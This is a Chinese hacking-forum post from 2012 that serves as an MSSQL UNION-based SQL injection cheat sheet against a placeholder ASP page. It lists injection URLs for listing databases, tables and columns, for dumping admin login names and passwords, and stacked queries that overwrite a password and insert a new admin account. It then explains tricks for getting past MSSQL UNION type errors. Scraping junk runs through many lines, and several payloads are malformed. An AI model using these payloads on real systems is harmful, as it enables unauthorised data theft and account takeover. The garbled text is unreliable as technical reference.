找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1927|回复: 0
打印 上一主题 下一主题

MSSQL用union查询爆数据

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:26:06 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
爆库:
* D" v- D+ Y6 Q/ ?4 u: q& Yhttp://duck/index.asp.id=10 UNION SELECT TOP 1 SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA.--2 ?2 x, j8 N: r2 Y  c9 P! h
SELECT TOP 1 SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA.9 c& W  m- q( v% z! i! f3 F7 ~
爆下一个库:$ p6 V5 @. N( S6 T! }2 o' }& s
http://duck/index.asp.id=10 UNION SELECT TOP 1 SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA WHERE TABLE_NAME NOT IN ('库名')--
: R- I' m8 A: ^, F' t1 a
+ i* c% a# G9 o( ]9 i+ t  ~- G爆表:
* ?2 W& J2 T2 u+ }: \: H) r( }) ]. fhttp://duck/index.asp.id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
8 [4 t3 C7 s5 P9 R/ L6 j: n2 c1 N# g$ T8 O% N
SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES.
# _, q. {3 ?. B. u1 |8 k$ h3 O* t/ q$ E% |# Y' r
爆下一个表
, S" R, n( u4 N! Qhttp://duck/index.asp.id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('table1')--
( e+ U$ d; A9 L8 N+ z( m& J7 m9 X5 A  c8 D
http://duck/index.asp.id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%login%'--8 N0 q+ O4 I6 u# G% B9 M% n
- I; @  B( C. ^/ m
) R. j3 v& [4 z1 q: S

0 F9 v, g: C) A! M% g, r: g爆字段:
/ ]: }; t. y& j5 o$ T, c: @http://duck/index.asp.id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'--2 v& G& w& I" K1 ^, `7 w
  e' |* B/ S2 B6 a8 K# P2 y6 {( z
爆下一个字段
9 S, r4 d$ L* _% M- Z: Nhttp://duck/index.asp.id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id')--
0 _# H& J3 n6 c6 }3 f7 x
% X( |0 z; n, A' T+ e. Fhttp://duck/index.asp.id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id','login_name','password',details')--2 B! N( d7 s& z% V

( l' p' V4 {  e- H% C1 }
; a) g, X+ g0 j6 [( k+ m" P爆字段里的内容6 `& n$ B* I% G0 l1 f5 L
http://duck/index.asp.id=10 UNION SELECT TOP 1 login_name FROM admin_login--" z" x9 [. M3 H6 T/ ~6 H7 o1 g! s! J" r
# l2 e* G/ o- Z  Z  [
http://duck/index.asp.id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='neo'--
/ x* K% j0 @8 A$ V& g5 n9 Y' \: s& d1 j3 X) {& Y/ D- z& Q2 ?, \5 V
http://duck/index.asp.id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='trinity'--
" g* |2 f- R2 d+ O2 P; r' e' |2 T+ L  ]
- m5 J  J& l& E# m! Jhttp://duck/index.asp.id=10 UNION SELECT TOP 1 convert(int,password.morpheus.) FROM admin_login where login_name='trinity'--4 |  l4 p- n' F6 m! S6 d% G- s

3 B" s# d  K' A" U更新字段里的内容
3 F4 M) W& z8 A# v' a; Ohttp://duck/index.asp.id=10; UPDATE .admin_login. SET .password. = .newpas5. WHERE login_name='neo'--
% j1 r' o% b* n$ C7 g3 @8 i, a* N' R" L- B
http://duck/index.asp.id=10; INSERT INTO .admin_login. (.login_id.,.login_name.,.password.,.details.) VALUES (666,.neo2.,.newpas5.,.NA.)--
6 N5 ~* g) ?' A/ W
+ Y! p, p7 c# P4 B8 x! ~3 c
, h1 _) [9 n9 ^6 W: q% I6 p8 \8 B2 @( C% Z1 a5 v3 Y4 c& I
        在注射的时候,access和mysql环境下,我们通常是通过union来获取数据的。但是遇到mssql环境,union很多时候都行不通,如果页面不报错,openrowset不可用,往往时候就只有暴力了。这样多不好,大家都是文明人,怎么可以用这么野蛮的手段呢?研究了一下,mssql中的union选择主要有以下几个方面的限制。' Y0 w  |) Q3 c4 n, h# }% h" r
    第一个是varchar/nvarchar和int类型的字段union到一起会强制转换出错。这个可以去看superhei大牛N久以前的文章,用and 1=2 把union前面的结果集置空就可以解决了。
( d( K! Z! l7 F# I6 N- |8 v, f# B, h* O    第二个是当前面语句选择的字段有text、ntext 或者image格式的时候,不能用DISTINCT 方式来选择,而带union的语句必然是以DISTINCT 方式来选择的。这也是为什么很多搜索型的注射点可以用union猜解的原因,因为搜索点的语句很少会选到前面三种格式的字段。Image是二进制格式,一般不会出现在需要回显的sql语句中。这种限制前段时间也看到牛淫给出了解决方法,union后面跟一个all,即union all就搞定了。真是神奇啊,牛淫就是牛淫。; ]: L4 |* p8 p8 s
    最后还有一个限制是text/ntext 与 int类型的字段 union到一起时并不兼容,会报操作数类型冲突的错误,就算用1=2把union前面语句的结果置空也一样。前几天突然想到,union的时候我们经常用1,2,3……之类的常数来补齐相差的列数。这时候后面的语句选择的都是int类型的字段,遇到前面有text/ntext的字段当然会出错,如果加上引号呢,即'1’,'2’,'3’……的形式?这时候后面的字段都是char或者varchar的类型了,应该就不会出错了。如果注射点过滤了引号怎么办?因为mssql对16进制格式的支持不是太好,很多地方用16进制必须declare――set,那就用char吧,即and 1=2 union all select char(49),char(50)……的形式。3 o# i; Q  d1 m+ r

5 G& W' Q+ R1 D  \5 W突了了大部份限制的语句
# O" R- y4 e4 w4 f5 |1 aand 1=2 union all select char(49),char(50),null,null;--
, f/ {( F! J5 Q- N8 `: C; r  i6 s* v" A/ \8 m

( E$ i8 G' H' W) j2 z: M$ \1 ~. Nnull也可以正常执行,不过没有回显,不好判断回显的列数。  P1 ~2 `% o4 p5 U2 D9 a: c  g- h
一般union遇到问题都是有text或者ntext字段,image的很少遇到
& i& O# }3 e( V
& Q, E' f1 Y, M可以先null完之后再一个个用1,2,3,4代替,这样就能逼出image类型的列鸟* W6 ?4 f0 k5 T8 Y- X1 O
! T4 e9 d. K! i
/ h+ q6 B4 A8 y/ b2 \/ E: s6 p
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表